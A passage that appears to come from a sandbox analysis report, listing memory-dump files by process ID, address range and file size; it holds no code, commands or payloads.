memory/2836-308-0x000002DDA73C0000-0x000002DDA73DC000-memory.dmpFilesize
112KB
-
memory/2836-290-0x0000000000000000-mapping.dmp
-
memory/2836-314-0x000002DDA73E0000-0x000002DDA7499000-memory.dmpFilesize
740KB
-
memory/2836-347-0x000002DDA82E0000-0x000002DDA82EA000-memory.dmpFilesize
40KB
-
memory/2976-191-0x0000000000000000-mapping.dmp
-
memory/3040-200-0x0000000000000000-mapping.dmp
-
memory/3144-192-0x0000000000000000-mapping.dmp
-
memory/3156-193-0x0000000000000000-mapping.dmp
-
memory/3244-466-0x000001FB7DD10000-0x000001FB7DD17000-memory.dmpFilesize
28KB
-
memory/3244-464-0x000001FB7E430000-0x000001FB7E436000-memory.dmpFilesize
24KB
-
memory/3300-190-0x0000000000000000-mapping.dmp
-
memory/3832-475-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3832-472-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3832-476-0x0000000001460000-0x0000000001480000-memory.dmpFilesize
128KB
-
memory/3832-471-0x000000014036EAC4-mapping.dmp
-
memory/3832-478-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3832-487-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3832-470-0x0000000140000000-0x0000000140809000-memory.dmpFilesize
8.0MB
-
memory/3956-204-0x0000000000000000-mapping.dmp
-
memory/3964-445-0x0000000000000000-mapping.dmp
-
memory/4132-194-0x0000000000000000-mapping.dmp
-
memory/4184-195-0x0000000000000000-mapping.dmp
-
memory/4236-196-0x0000000000000000-mapping.dmp
-
memory/4260-262-0x0000000000000000-mapping.dmp
-
memory/4264-261-0x0000000000000000-mapping.dmp
-
memory/4480-201-0x0000000000000000-mapping.dmp
-
memory/4504-442-0x0000000000000000-mapping.dmp
-
memory/4520-202-0x0000000000000000-mapping.dmp
-
memory/4648-458-0x0000024CB1B50000-0x0000024CB1B62000-memory.dmpFilesize
72KB
-
memory/4648-453-0x0000024C98ED0000-0x0000024C98ED6000-memory.dmpFilesize
24KB
-
memory/4672-486-0x0000000000000000-mapping.dmp
-
memory/4728-477-0x0000000000000000-mapping.dmp
-
memory/4728-203-0x0000000000000000-mapping.dmp
-
memory/4740-444-0x0000000000000000-mapping.dmp
-
memory/4748-469-0x0000000000000000-mapping.dmp
-
memory/4868-474-0x0000000000000000-mapping.dmp
-
memory/4884-254-0x0000000000000000-mapping.dmp
-
memory/4884-479-0x0000000000000000-mapping.dmp
-
memory/4956-127-0x0000000000400000-0x000000000106F000-memory.dmpFilesize
12.4MB
-
memory/4956-128-0x0000000000400000-0x000000000106F000-memory.dmpFilesize
12.4MB
-
memory/4956-129-0x00007FF963120000-0x00007FF9632FB000-memory.dmpFilesize
1.9MB
-
memory/4956-130-0x0000000000400000-0x000000000106F000-memory.dmpFilesize
12.4MB
-
memory/4956-131-0x00007FF963120000-0x00007FF9632FB000-memory.dmpFilesize
1.9MB
-
memory/4968-136-0x0000014BF6DB0000-0x0000014BF71CE000-memory.dmpFilesize
4.1MB
-
memory/4968-137-0x0000014BDBD30000-0x0000014BDC14E000-memory.dmpFilesize
4.1MB
-
memory/5012-199-0x0000000000000000-mapping.dmp
-
memory/5064-144-0x0000000000000000-mapping.dmp
-
memory/5064-150-0x000002A0EC270000-0x000002A0EC292000-memory.dmpFilesize
136KB
-
memory/5064-153-0x000002A0ECDE0000-0x000002A0ECE56000-memory.dmpFilesize
472KB
-
memory/5092-186-0x0000000000000000-mapping.dmp